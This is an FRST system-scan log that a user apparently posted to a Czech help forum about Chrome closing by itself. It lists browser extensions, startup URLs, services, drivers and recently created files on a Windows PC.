Tcpip\..\Interfaces\{41390136-14d9-4ad4-b140-a0d1b94d90a2}: [DhcpNameServer] 192.168.0.254
Tcpip\..\Interfaces\{91f1ad30-beeb-4fbf-885e-1e6e9d6a8c76}: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{bcbdebf0-34e1-4d08-879c-a923554a03f8}: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{e34a0e74-b114-4d52-943c-b674323e6033}: [DhcpNameServer] 192.168.10.1 0.0.0.0
Tcpip\..\Interfaces\{f40d0ce8-acff-40fe-a1fd-500b8f330d09}: [DhcpNameServer] 192.168.10.1 0.0.0.0

Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default [2022-11-05]
Edge HomePage: Default -> hxxp://www.google.com/
Edge Extension: (7TV) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ammjkodgmmoknidbanneddgankgfejfh [2022-08-18]
Edge Extension: (LastPass: Free Password Manager) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bbcinlkgjjkejfdpemiealijmmooekmp [2022-10-23]
Edge Extension: (DuckDuckGo) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\caoacbimdbbljakfhgikoodekdnlcgpk [2022-11-04]
Edge Extension: (minerBlock) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\emikbbbebcdfohonlaifafnoanocnebl [2022-10-19]
Edge Extension: (FrankerFaceZ) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fadndhdgpmmaapbmfcknlfgcflmmmieb [2022-07-11]
Edge Extension: (Return YouTube Dislike) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gebbhagfogifgggkldgodflihgfeippi [2022-10-19]
Edge Extension: (Microsoft Editor: kontrola pravopisu a gramatiky) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hokifickgkhplphjiodbggjmoafhignh [2022-10-31]
Edge Extension: (BetterTTV) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\icllegkipkooaicfmdfaloehobmglglb [2022-10-19]
Edge Extension: (Dark Reader) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ifoakfbpdcdoeenechcleahebpibofpc [2022-10-19]
Edge Extension: (Gladiatus nBot) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\npfihoncaeggchfpldnmodmdajngpjib [2022-02-23]
Edge Extension: (I don't care about cookies) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\oholpbloipjbbhlhohaebmieiiieioal [2022-10-31]
Edge Extension: (Blokátor reklam AdGuard) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\pdffkfellgipmhklpdmokmckkkfcopbh [2022-10-31]
Edge Extension: (Google Sheets) - C:\Users\Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extension\rcefqbaerclldjeikmcnmojdknirlfai\2.4.2._0 [2022-07-14]

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.331.2 -> C:\Program Files\Java\jre1.8.0_331\bin\dtplugin\npDeployJava1.dll [2022-06-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.331.2 -> C:\Program Files\Java\jre1.8.0_331\bin\plugin2\npjp2.dll [2022-06-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.11 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.12 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.16 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=3.0.16 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-02-15] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Profile 2
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default [2022-11-05]
CHR DefaultSearchURL: Default -> hxxps://duckduckgo.com/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> duckduckgo.com
CHR DefaultNewTabURL: Default -> hxxps://duckduckgo.com/chrome_newtab
CHR DefaultSuggestURL: Default -> hxxps://duckduckgo.com/ac/?q={searchTerms}&type=list
CHR Extension: (Blokátor reklam AdGuard) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgnkhhnnamicmpeenaelnjfhikgbkllg [2022-06-23]
CHR Extension: (DuckDuckGo) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkdgflcldnnnapblkhphbgpggdiikppg [2022-06-27]
CHR Extension: (Dark Reader) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\eimadpbcbfnmbkopoojfekhnkhdbieeh [2022-06-23]
CHR Extension: (I don't care about cookies) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihnjjcciajhdojfnbdddfaoknhalnja [2022-06-23]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2022-06-23]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-01-05]
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Guest Profile [2022-06-10]
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2 [2022-11-07]
CHR Notifications: Profile 2 -> hxxps://app.smartsupp.com; hxxps://aukro.cz
CHR HomePage: Profile 2 -> hxxp://www.google.com/
CHR StartupUrls: Profile 2 -> "hxxps://www.google.com/","hxxp://www.google.com","hxxp://home.torchbrowser.com/?systemid=448&appid=107&ua=Torch","hxxp://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.duckduckgo.com"
CHR Extension: (Just Black) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aghfnjkcakhmadgdomlmlhhaocbkloab [2022-01-22]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-08-30]
CHR Extension: (buykers | slevové kupony a kódy) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\dacdinoicboceafielngnmjjplncljhj [2022-10-26]
CHR Extension: (Return YouTube Dislike) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\gebbhagfogifgggkldgodflihgfeippi [2022-09-23]
CHR Extension: (Dokumenty Google offline) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-11-01]
CHR Extension: (SponsorBlock pro YouTube - Přeskoč sponzorství) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\mnjggcdmjocbbbhaepdhchncahnbgone [2022-11-07]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-01-22]
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3 [2022-11-05]
CHR HomePage: Profile 3 -> hxxp://www.google.com/
CHR StartupUrls: Profile 3 -> "hxxps://www.google.com/","hxxp://www.google.com","hxxp://home.torchbrowser.com/?systemid=448&appid=107&ua=Torch","hxxp://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.duckduckgo.com"
CHR Extension: (Ekvalizér pro Chrome browser) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\abikfbojmghmfjdjlbagiamkinbmbaic [2022-05-25]
CHR Extension: (Safe Torrent Scanner) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-08-15]
CHR Extension: (IBM Security Rapport) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\bbjllphbppobebmjpjcijfbakobcheof [2022-05-25]
CHR Extension: (Blokátor reklam AdGuard) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\bgnkhhnnamicmpeenaelnjfhikgbkllg [2022-05-25]

Re: Chrome shuts down on its own

Post by autoprd » 07 Nov 2022 23:31

CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-08-15]
CHR Extension: (Return YouTube Dislike) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\gebbhagfogifgggkldgodflihgfeippi [2022-08-15]
CHR Extension: (Dokumenty Google offline) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-08-15]
CHR Extension: (Malwarebytes Browser Guard) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2022-08-15]
CHR Extension: (Excel Online) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\iljnkagajgfdmfnnidjijobijlfjfgnb [2022-05-25]
CHR Extension: (CrossPilot) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\migomhggnppjdijnfkiimcpjgnhmnale [2022-05-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2022-05-25]
CHR Extension: (Slinky Glamour) - C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\phcgjdgneipghoeikoeenifpknfkjpil [2022-05-25]
CHR Profile: C:\Users\Woytman\AppData\Local\Google\Chrome\User Data\System Profile [2022-11-05]
CHR HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Adguard Service; C:\Program Files (x86)\Adguard\AdguardSvc.exe [467928 2022-03-05] (Adguard Software Limited -> Adguard Software Ltd)
S4 CCleanerPerformanceOptimizerService; C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe [1185616 2022-10-20] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [12516280 2022-11-02] (Microsoft Corporation -> Microsoft Corporation)
S3 dcsvc; C:\WINDOWS\system32\dcsvc.dll [831488 2022-09-06] (Microsoft Windows -> Microsoft Corporation)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934352 2022-07-11] (Epic Games Inc. -> Epic Games, Inc.)
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [2131432 2022-10-11] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [7166552 2022-10-11] (GOG Sp. z o.o. -> GOG.com)
R2 Micro Star SCM; C:\WINDOWS\SysWOW64\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S3 MSI Foundation Service; C:\Program Files (x86)\MSI\Dragon Center\MSIAPP_Service\MSIAPService.exe [47568 2018-10-29] (Micro-Star International CO., LTD. -> Micro-Star International Co., Ltd.)
R2 nlsvc; C:\Program Files\Locktime Software\NetLimiter 4\NLSvc.exe [22872 2022-10-02] (Locktime Software s.r.o. -> Locktime Software)
R2 Razer Chroma SDK Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe [2032040 2022-09-27] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [480176 2022-09-19] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma Stream Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe [1354232 2022-06-15] (Razer USA Ltd. -> Razer Inc.)
R3 Razer Game Manager Service; C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe [254224 2021-11-16] (Razer USA Ltd. -> Razer Inc)
R2 Razer Synapse Service; C:\Program Files (x86)\Razer\Synapse3\Service\Razer Synapse Service.exe [300552 2022-10-05] (Razer USA Ltd. -> Razer Inc.)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2720088 2022-11-02] (Rockstar Games, Inc. -> Rockstar Games)
R2 RzActionSvc; C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe [537912 2022-08-12] (Razer USA Ltd. -> Razer Inc.)
S3 Sendevsvc; C:\Program Files (x86)\MSI\Dragon Center\Sendevsvc\Sendevsvc.exe [302888 2019-01-30] (Micro-Star International CO., LTD. -> ) [File not signed]
R2 THXService; C:\Program Files (x86)\Razer\THXService\Drivers\x64\THXService.exe [356312 2019-09-18] (Razer USA Ltd. -> THX)
S3 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [142856 2021-11-19] (Microsoft Windows Hardware Compatibility Publisher -> Thrustmaster®)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\NisSrv.exe [3191224 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MsMpEng.exe [133536 2022-11-01] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 Browser; %SystemRoot%\System32\browser.dll [X]
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_3c492dde906d8149\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_3c492dde906d8149\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 adgnetworkwfpdrv; C:\WINDOWS\System32\drivers\adgnetworkwfpdrv.sys [98840 2021-11-02] (Microsoft Windows Hardware Compatibility Publisher -> Adguard Software Ltd)
S3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [42256 2019-11-22] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [59360 2019-11-22] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2020-06-29] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
S3 logi_joy_bus_enum; C:\WINDOWS\system32\drivers\logi_joy_bus_enum.sys [33528 2022-03-22] (WDKTestCert builder,132743893872553407 -> Logitech)
S3 logi_joy_vir_hid; C:\WINDOWS\system32\drivers\logi_joy_vir_hid.sys [21704 2022-03-22] (WDKTestCert builder,132743893872553407 -> Logitech)
S3 logi_joy_xlcore; C:\WINDOWS\system32\drivers\logi_joy_xlcore.sys [62904 2022-03-22] (WDKTestCert builder,132743893872553407 -> Logitech)
S3 MpKsla53bd8d0; C:\WINDOWS\system32\MpEngineStore\MpKslDrv.sys [228632 2022-11-07] (Microsoft Windows -> Microsoft Corporation)
R1 MSIO; C:\WINDOWS\system32\drivers\MsIo64.sys [17424 2020-01-19] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd)
R0 nldrv; C:\WINDOWS\System32\drivers\nldrv.sys [182312 2022-10-02] (Microsoft Windows Hardware Compatibility Publisher -> Locktime Software)
R3 NvModuleTracker; C:\WINDOWS\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_0c1cc60a4b422185\NvModuleTracker.sys [45656 2022-07-14] (Nvidia Corporation -> NVIDIA Corporation)
S0 RapportHades64; C:\WINDOWS\System32\Drivers\RapportHades64.sys [398984 2020-08-18] (IBM -> IBM Corp.)
S0 RapportKE64; C:\WINDOWS\System32\Drivers\RapportKE64.sys [448904 2020-08-18] (IBM -> IBM Corp.)
S3 Revoflt; C:\WINDOWS\System32\DRIVERS\revoflt.sys [38400 2021-11-17] (Microsoft Windows Hardware Compatibility Publisher -> VS Revo Group)
S3 RT-USB; C:\WINDOWS\system32\drivers\RT-USB64.SYS [97152 2014-05-12] (Ross-Tech, LLC -> Ross-Tech LLC)
R3 rt68cx21; C:\WINDOWS\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_9e453ab47cf9cf42\rt68cx21x64.sys [652264 2022-07-23] (Realtek Semiconductor Corp. -> Realtek)
R3 RzCommon; C:\WINDOWS\System32\drivers\RzCommon.sys [55128 2021-06-10] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_007a; C:\WINDOWS\System32\drivers\RzDev_007a.sys [54152 2020-08-24] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_024e; C:\WINDOWS\System32\drivers\RzDev_024e.sys [54168 2020-08-24] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_0520; C:\WINDOWS\System32\drivers\RzDev_0520.sys [54088 2021-03-22] (Razer USA Ltd. -> Razer Inc)
S3 RzDev_0f19; C:\WINDOWS\System32\drivers\RzDev_0f19.sys [54152 2020-08-24] (Razer USA Ltd. -> Razer Inc)
S3 RZSURROUNDVADService; C:\WINDOWS\system32\drivers\RzSurroundVAD.sys [49176 2016-10-16] (Razer USA Ltd. -> Windows (R) Win 7 DDK provider)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
S3 SIVDriver; C:\WINDOWS\system32\Drivers\SIVX64.sys [205552 2021-02-12] (RH Software Ltd -> Ray Hinchliffe)
S3 SjtWinIo20; C:\WINDOWS\System32\drivers\SjtWinIo_v2_0.sys [11776 2021-01-28] (SpeedJet Technology INC.) [File not signed]
S3 sRZTHXSpatial; C:\WINDOWS\System32\drivers\RZTHXSpatial.sys [172024 2020-04-26] (Razer USA Ltd. -> Windows (R) Win 7 DDK provider)
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64872 2019-09-26] (Samsung Electronics Co., Ltd. -> QUALCOMM Incorporated)
R3 sTHXVAD; C:\WINDOWS\System32\drivers\THXVAD.sys [162184 2019-09-17] (Razer USA Ltd. -> Windows (R) Win 7 DDK provider)
S3 tmhidusb; C:\WINDOWS\system32\DRIVERS\tmhidusb.sys [432136 2021-11-19] (Microsoft Windows Hardware Compatibility Publisher -> Thrustmaster)
S3 tmT80HidBus; C:\WINDOWS\System32\Drivers\tmT80HidBus.sys [146544 2018-12-03] (WDKTestCert plukidis,131540205154897060 -> © Guillemot R&D, 2018. All rights reserved.)
S3 tmT80hidusb; C:\WINDOWS\System32\drivers\tmt80hidusb.sys [90328 2018-12-03] (Microsoft Windows Hardware Compatibility Publisher -> Thrustmaster)
S3 tmwbulk; C:\WINDOWS\System32\Drivers\tmwbulk.sys [381984 2021-03-24] (Microsoft Windows Hardware Compatibility Publisher -> © Guillemot R&D, 2021. All rights reserved.)
S3 trufos; C:\WINDOWS\System32\drivers\trufos.sys [611728 2021-02-21] (Bitdefender SRL -> Bitdefender)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1092456 2022-06-16] (Shanghai Yitu Information Technology Co., Ltd. -> e2eSoft)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49616 2022-11-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [469280 2022-11-01] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [95520 2022-11-01] (Microsoft Windows -> Microsoft Corporation)
S3 windtun420; C:\WINDOWS\System32\drivers\windtun420.sys [47544 2021-06-02] (Windscribe Limited -> WireGuard LLC)
S3 WINIO; C:\Program Files (x86)\MSI\Dragon Center\winio64.sys [18688 2018-07-18] (WDKTestCert heavenluo,131620253795976757 -> )
R3 WiseUnlock; C:\WINDOWS\WiseUnlock64.sys [33864 2020-09-26] (Beijing Lang Xingda Network Technology Co., Ltd -> WiseCleaner.com)
S4 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
U0 Partizan; system32\drivers\Partizan.sys [X]
S4 semav6msr64; \??\C:\WINDOWS\system32\drivers\semav6msr64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: DcSvc -> C:\Windows\system32\dcsvc.dll (Microsoft Corporation)

==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-11-07 22:44 - 2022-11-07 22:44 - 000040674 _____ C:\Users\Woytman\Desktop\FRST.txt
2022-11-07 22:44 - 2022-11-07 22:44 - 000000000 ____D C:\FRST
2022-11-07 22:38 - 2022-11-07 22:38 - 002374656 _____ (Farbar) C:\Users\Woytman\Desktop\FRST64.exe
2022-11-07 22:34 - 2022-11-07 22:34 - 000000000 ____D C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni
2022-11-07 21:36 - 2022-11-07 21:36 - 000006766 _____ C:\Users\Woytman\Desktop\pcbs.txt
2022-11-07 21:34 - 2022-11-07 21:34 - 000262794 _____ C:\Users\Woytman\Desktop\PCBS.xlsx
2022-11-07 18:40 - 2022-11-07 19:02 - 000003127 _____ C:\Users\Woytman\Desktop\footer_part.php
2022-11-07 16:40 - 2022-11-07 16:40 - 000003416 _____ C:\WINDOWS\system32\Tasks\CCleanerCrashReporting
2022-11-07 16:40 - 2022-11-07 16:40 - 000000760 _____ C:\WINDOWS\Tasks\CCleanerCrashReporting.job
2022-11-07 16:37 - 2022-11-07 22:44 - 000000000 ____D C:\WINDOWS\system32\MpEngineStore
2022-11-06 21:32 - 2022-11-06 21:32 - 2823296964 _____ C:\Users\Woytman\Desktop\PC Building Simulator.7z
2022-11-06 00:28 - 2022-11-06 00:28 - 000001008 _____ C:\Users\Woytman\Desktop\zkouska-prekladu.txt
2022-11-05 16:23 - 2022-11-07 22:34 - 000002487 _____ C:\Users\Woytman\Desktop\Google Chrome.lnk
2022-11-05 02:37 - 2022-11-05 02:37 - 000000000 ____D C:\WINDOWS\LastGood
2022-11-05 02:13 - 2022-10-26 23:30 - 002236992 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe
2022-11-05 02:13 - 2022-10-26 23:30 - 002236992 _____ C:\WINDOWS\system32\vulkaninfo.exe
2022-11-05 02:13 - 2022-10-26 23:30 - 001642600 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2022-11-05 02:13 - 2022-10-26 23:30 - 001642600 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2022-11-05 02:13 - 2022-10-26 23:30 - 001444448 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll
2022-11-05 02:13 - 2022-10-26 23:30 - 001444448 _____ C:\WINDOWS\system32\vulkan-1.dll
2022-11-05 02:13 - 2022-10-26 23:30 - 001168960 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll
2022-11-05 02:13 - 2022-10-26 23:30 - 001168960 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2022-11-05 02:13 - 2022-10-26 23:29 - 001487880 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2022-11-05 02:13 - 2022-10-26 23:29 - 001226744 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2022-11-05 02:13 - 2022-10-26 23:26 - 000865272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvml.dll
2022-11-05 02:13 - 2022-10-26 23:26 - 000672280 _____ C:\WINDOWS\system32\nvofapi64.dll
2022-11-05 02:13 - 2022-10-26 23:26 - 000507440 _____ C:\WINDOWS\SysWOW64\nvofapi.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 002161640 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 001618944 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 001530864 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 001190912 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 000950272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2022-11-05 02:13 - 2022-10-26 23:25 - 000746496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvidia-smi.exe
2022-11-05 02:13 - 2022-10-26 23:24 - 012451824 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 010219016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 005891080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 003334656 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 000734720 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2022-11-05 02:13 - 2022-10-26 23:24 - 000458248 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdebugdump.exe
2022-11-05 02:13 - 2022-10-26 23:23 - 005856760 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcudadebugger.dll
2022-11-05 02:13 - 2022-10-26 23:23 - 005816312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2022-11-05 02:13 - 2022-10-26 23:23 - 000853016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\MCU.exe
2022-11-05 02:13 - 2022-10-26 23:21 - 007642784 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2022-11-05 02:13 - 2022-10-26 23:21 - 006512336 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2022-11-05 02:13 - 2022-10-26 01:15 - 000100589 _____ C:\WINDOWS\system32\nvinfo.pb
2022-11-05 02:09 - 2022-11-05 02:09 - 000004308 _____ C:\WINDOWS\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003976 _____ C:\WINDOWS\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003940 _____ C:\WINDOWS\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
